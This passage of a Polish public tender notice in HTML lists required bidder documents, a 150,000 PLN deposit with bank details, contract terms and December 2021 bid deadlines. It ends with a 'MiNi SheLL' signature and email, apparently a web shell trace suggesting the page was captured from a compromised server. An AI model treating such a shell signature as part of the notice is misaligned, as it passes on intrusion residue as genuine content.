Koncepcji. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> jw. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 24. Ofertę sporządza się w języku polskim się na Formularzu Ofertowym – zgodnie z<br/>Załącznikiem nr 1 do SWZ. Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>a) w przypadku, gdy oferta obejmuje rozwiązania równoważne rozwiązaniom opisywanym w<br/>dokumentacji projektowej – PFU i Koncepcji w zakresie rozwiązań, materiałów, urządzeń, innych elementów, do oferty należy dołączyć ich zestawienie, zgodnie z załącznikiem nr 1a do SWZ wraz z dowodami świadczącymi o równoważności.<br/>b) oświadczenie, o którym mowa w Rozdziale 1, Dział VIII pkt. 1 ppkt 1 SWZ;<br/>c) zobowiązanie innego podmiotu oraz jego oświadczenie, o których mowa w Rozdziale 1 Dział VIII pkt. 1 ppkt 1 i 2 SWZ (jeżeli dotyczy);<br/>d) dokumenty, z których wynika prawo do podpisania oferty; odpowiednie pełnomocnictwa (jeżeli<br/>dotyczy);<br/>e) oświadczenie, o którym mowa w art. 117 ust. 4 PZP (o ile dotyczy);<br/>f) potwierdzenie wniesienia wadium/gwarancja/poręczenie wadialne. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Oferta powinna być zabezpieczona wadium w wysokości: 150 000,00 PLN (słownie złotych:<br/>sto pięćdziesiąt tysięcy).<br/>2. Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących<br/>formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z<br/>2020 r. poz. 299)<br/>3. W przypadku wnoszenia wadium w pieniądzu, kwota oznaczona w punkcie 1 powinna zostać<br/>przelana na konto Zamawiającego:<br/>w banku: Bank Pekao S.A II/O Szczecin<br/>nr konta: 86 1240 3927 1111 0000 4099 0732,<br/>a Wykonawca dołączy do oferty kserokopię polecenia przelewu.<br/>4. Wadium uznaje się za wniesione w momencie uznania rachunku Zamawiającego (realnego<br/>wpływu wadium na rachunek Zamawiającego przed terminem składania ofert).<br/>5. W przypadku wnoszenia wadium w formie poręczenia lub gwarancji, za pośrednictwem<br/>platformy zakupowej – Zamawiający wymaga złożenia dokumentu w postaci elektronicznej na<br/>zasadach określonych w SWZ – z zastrzeżeniem, iż będzie on podpisany kwalifikowanym<br/>podpisem elektronicznym przez Gwaranta tj. wystawcę gwarancji/poręczenia.<br/>6. Termin wnoszenia wadium upływa wraz z upływem terminu składania ofert <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> zgodnie z swz <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> zgodnie z swz <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-22 11:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/usz</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-22 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-20</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com